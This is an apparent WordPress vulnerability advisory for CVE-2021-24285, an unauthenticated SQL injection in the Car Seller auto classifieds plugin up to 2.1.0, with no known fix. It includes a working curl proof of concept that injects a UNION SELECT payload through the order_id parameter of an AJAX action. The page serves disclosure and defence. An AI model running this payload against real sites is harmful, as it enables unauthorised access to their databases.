Car Seller – Auto Classifieds Script <= 2.1.0 – Unauthenticated SQL Injection | CVE 2021-24285 | Plugin Vulnerabilities

Description

The request_list_request AJAX call of the plugin, available to both authenticated and unauthenticated users, does not sanitise, validate or escape the order_id POST parameter before using it in a SQL statement, leading to a SQL Injection issue.

Proof of Concept

curl 'https://example.com/wp-admin/admin-ajax.php' \
  --data-raw 'action=request_list_request&order_id=-1662 UNION ALL SELECT NULL,NULL,current_user(),current_user(),current_user(),NULL,current_user(),current_user(),NULL-- -' \
  --compressed \
  --insecure

Affects Plugins

cars-seller-auto-classifieds-script

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/24-04-2021-wp-plugin-cars-seller-auto-classifieds-script-sql-injection/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

f35d6ab7-dd52-48b3-a79c-3f89edf24162

Timeline

Publicly Published

2021-04-26 (about 4 years ago)

Added

2021-04-26 (about 4 years ago)

Last Updated

2021-04-29 (about 4 years ago)

Other

Published

Title

Published

2015-04-14

Title

Community Events < 1.4 - SQL Injection

Published

2020-04-28

Title

WP-Advanced-Search < 3.3.7 - Authenticated SQL Injection

Published

2023-06-05

Title

Custom 404 Pro < 3.8.1 - Multiple SQL Injection

Published

2024-11-08

Title

Share Buttons – Social Media <= 1.0.2 - Authenticated (Contributor+) SQL Injection

Published

2024-07-22

Title

ListingPro Plugin <= 2.9.3 - Authenticated (Subscriber+) SQL Injection